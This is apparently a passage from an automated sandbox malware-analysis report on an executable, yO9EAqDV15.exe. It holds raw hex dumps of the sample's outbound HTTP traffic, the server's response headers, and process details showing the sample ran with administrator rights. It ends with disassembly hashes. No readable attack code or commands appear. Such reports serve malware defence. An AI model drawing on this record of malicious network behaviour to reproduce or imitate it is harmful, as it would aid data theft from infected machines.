                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 90 2b 65 25 43 a9 29 5f a8 f7 00 7c df e8 dc e1 06 69 db ad 15 45 2d e1 9c cc 08 35 4b 57 64 4b ee bb 85 7a df 3d 01 d8 6d 61 71 1a ff 42 3d 85 f2 4f 83 79 d3 8a b9 4d 7a d5 9e ef a2 73 1b d2 96 6c 28 1d 72 3a 2d d0 f0 77 bb b8 f0 ab d2 ef 9c ee f2 58 87 c5 a8 10 83 49 9e 8e 8f c0 74 28 42 62 a9 47 ab b8 0a a1 01 e3 89 45 a1 70 34 a9 42 0f c4 3b 21 ab af 5a 68 a4 14 5e 6d 68 c7 dd 95 f5 47 3d 2d 7c 10 f6 30 1d 5a 6e b3 a3 70 89 97 82 a8 90 f8 19 6f 36 ae 5a 42 6f ff dc 88 51 ba 5a 93 64 6c a8 0b ef 7a 1a 9a c1 73 20 4d 26 d6 b5 42 70 c4 09 50 bd 17 65 21 59 23 5c 9f f2 7c c9 87 da de 62 b1 88 68 ae ad d5 61 92 bd f0 6b a2 60 3d d6 15 dc 7c 41 86 98 5a 62 98 dd 15 1f 73 80 29 76 86 e1 67 ee 4f 8f 3d 1c 0d fa a6 df 5d cf 9a 89 78 08 00 74 8e b4 12 e7 fc 50
                                                                                                            Data Ascii: +e%C)_|iE-5KWdKz=maqB=OyMzsl(r:-wXIt(BbGEp4B;!Zh^mhG=-|0Znpo6ZBoQZdlzs M&BpPe!Y#\|bhak`=|AZbs)vgO=]xtP
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: f5 81 57 6d 8d da fe 4b fb 8d b3 33 aa f6 84 01 07 e5 10 bd e7 68 4e 31 ed e3 76 78 e0 ab 95 b1 8f ef 08 73 3b d6 31 84 c0 cb 53 bb 3d 7c 15 4a 16 d7 a8 47 f7 a5 c2 f1 7e bb 47 05 1f 8a ab 5d 87 68 45 a8 50 2d 7e 8a d5 d5 ea d8 5d 41 c4 6d 86 0d bb 70 8c f0 64 24 03 b5 90 69 c7 b3 18 cc d5 1f aa ae d0 31 e6 4b 91 b8 61 21 e1 7d 8d da 15 f0 9f 91 c2 33 dd 0b a8 e5 18 71 35 fa 84 e4 a2 a1 df de fb d3 49 00 03 9b 39 6d a4 a7 b3 4d 34 45 88 4f fb ee 78 63 a9 19 2d 61 d6 c0 6a b2 76 76 b8 04 58 8d e3 e4 64 b3 a8 3b d2 23 61 0f 59 b9 d5 56 d3 70 33 9c db d5 ea cb 1f 4e 69 29 23 7e ee a5 aa bb 7d 35 51 de 7f b1 35 0d 19 fc 70 45 71 2b 52 1e 63 9e df 20 e0 06 e1 c2 e5 d2 bb 03 6e 3d ec d7 41 6f a7 b6 24 ba c3 96 94 c1 c5 f2 57 c8 00 49 a8 f7 42 d2 45 6f 0b 25 8c
                                                                                                            Data Ascii: WmK3hN1vxs;1S=|JG~G]hEP-~]Ampd$i1Ka!}3q5I9mM4EOxc-ajvvXd;#aYVp3Ni)#~}5Q5pEq+Rc n=Ao$WIBEo%
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 71 4d 1c 96 dd dc ab 6e bd fd 53 8d cf 3b 81 30 2f b5 e7 e3 d9 73 35 97 d1 d8 b0 6e bd 9c 42 ce cd d3 8d 4a 77 2d 4a f9 9a 1a 9b b4 21 02 af fa 60 21 a1 83 db 93 81 9d b2 8b fa e3 37 09 26 11 26 f1 0b 57 35 53 e6 5e 8c 26 66 24 cd 69 23 63 dd 83 40 f1 5d 74 50 19 ed 75 eb af fe 1f 80 79 10 59 ff bf 91 f2 db 05 f1 5e 15 c9 e8 5b fc f0 3a d9 67 c6 8e f7 b1 0a 02 85 92 40 a6 8e 5a 03 fc 5f df 49 bb 00 65 0f be eb 7b d4 e0 9a 4b 9c ea 51 6d 9a 46 0b 4e a1 f4 e7 b6 fd 37 c7 2a ae 4f be 66 0d cc 77 9d ab 20 3a 45 c4 e2 dd 03 29 29 07 b0 13 6e 29 4a a5 3a 9d 97 e4 f7 b6 de 76 a4 86 05 9e 76 2e d7 7a 6b d3 cd 77 6c 1f c8 5d e1 25 cd 0a f2 6b 1a 18 d8 2b 6e 03 50 55 20 26 d9 28 ac 30 24 c0 55 e2 9b 22 f6 25 53 c9 86 7c fe 13 0c 81 10 3a 5c 89 60 7c f9 db 85 27 56
                                                                                                            Data Ascii: qMnS;0/s5nBJw-J!`!7&&W5S^&f$i#c@]tPuyY^[:g@Z_Ie{KQmFN7*Ofw :E))n)J:vv.zkwl]%k+nPU &(0$U"%S|:\`|'V
                                                                                                            2024-12-24 07:35:47 UTC15331OUTData Raw: 27 a4 66 50 70 d9 11 a6 e9 6b 19 bf 5f 4e 23 92 0a f4 69 a7 f4 f7 e3 75 dc 8e 78 62 c5 84 6e 37 cd 7b 3d 6a a3 bd bd 72 96 e2 2f f4 b4 64 67 8e be 65 6f 72 04 ed b3 6c a4 91 0c c8 0d df 7c 10 51 8c e1 45 4e 0e f2 91 3b c5 c0 43 3a e3 9d 21 30 a2 d3 6a b6 ec c5 7e ef 41 46 48 81 f3 13 3c fb 73 59 99 70 7a 7c 5e 7e 63 43 10 0d b0 6a 58 9e 53 16 60 19 fe c3 7d 38 68 35 93 3c 9f ff b0 8e f4 e6 f1 c1 48 88 73 fb 78 f0 4b 09 70 75 bb 43 56 cd 31 ef da 03 e0 a2 2e 2f 84 36 7f b7 c3 20 71 f1 f5 66 e2 25 c5 c8 6f 6b 6f 0e 29 9d 07 cf e6 f3 1d a4 fe 85 78 dc 93 41 82 c9 3c b8 76 75 46 ba 47 42 b5 3a 0e bc 11 c4 ff bc 25 79 69 db 01 50 7f e0 f9 75 b2 65 d8 6e 1e a4 43 48 8a 78 bc 1b c6 1c 52 5c ab d9 91 12 69 a2 0f c4 17 df 6d f5 d4 92 6a 6b 32 8c 39 36 c0 ba 47 89
                                                                                                            Data Ascii: 'fPpk_N#iuxbn7{=jr/dgeorl|QEN;C:!0j~AFH<sYpz|^~cCjXS`}8h5<HsxKpuCV1./6 qf%oko)xA<vuFGB:%yiPuenCHxR\imjk296G
                                                                                                            2024-12-24 07:35:51 UTC1126INHTTP/1.1 200 OK
                                                                                                            Date: Tue, 24 Dec 2024 07:35:50 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=2dba21g57vjllo96puktgo6m5g; expires=Sat, 19 Apr 2025 01:22:28 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oe06UGlooXujhUTuH07FiLp60MAMHTIuHGeq26YWlXVf6UYE4qxcyyD%2Fq29zHleHy6jkIvtgobrcFXIbW8QHIeifteY6EsIC5f3iQVoMbh0OHppwvvajzpsty0JrExYxqBU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f6eeaabeb208c60-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1802&rtt_var=681&sent=360&recv=593&lost=0&retrans=0&sent_bytes=2836&recv_bytes=574255&delivery_rate=1600877&cwnd=67&unsent_bytes=0&cid=a7368bd7633b512a&ts=3343&x=0"


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:02:35:28
                                                                                                            Start date:24/12/2024
                                                                                                            Path:C:\Users\user\Desktop\yO9EAqDV15.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\yO9EAqDV15.exe"
                                                                                                            Imagebase:0xcb0000
                                                                                                            File size:1'884'672 bytes
                                                                                                            MD5 hash:DCBBFBD538D99FEEC781122F6C905C1B
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Non-executed Functions

                                                                                                              Function 017E178A Relevance: .6, Instructions: 624COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2126425221.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, Offset: 017DB000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_17db000_yO9EAqDV15.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d34e622916fb08eb62458b47bd9892b1e8e45896efd5a233bc1f98f6ef28fafd
                                                                                                              • Instruction ID: 8dda80d5cbe86a9a68204070d023702e10c7f6e017521e8d7eb9b9cb4044ae5f
                                                                                                              • Opcode Fuzzy Hash: d34e622916fb08eb62458b47bd9892b1e8e45896efd5a233bc1f98f6ef28fafd
                                                                                                              • Instruction Fuzzy Hash: A0E18B6644E3D18FD7138B389866295BFF1AF57220B9E44DBC0C0CF0B3E269495AC762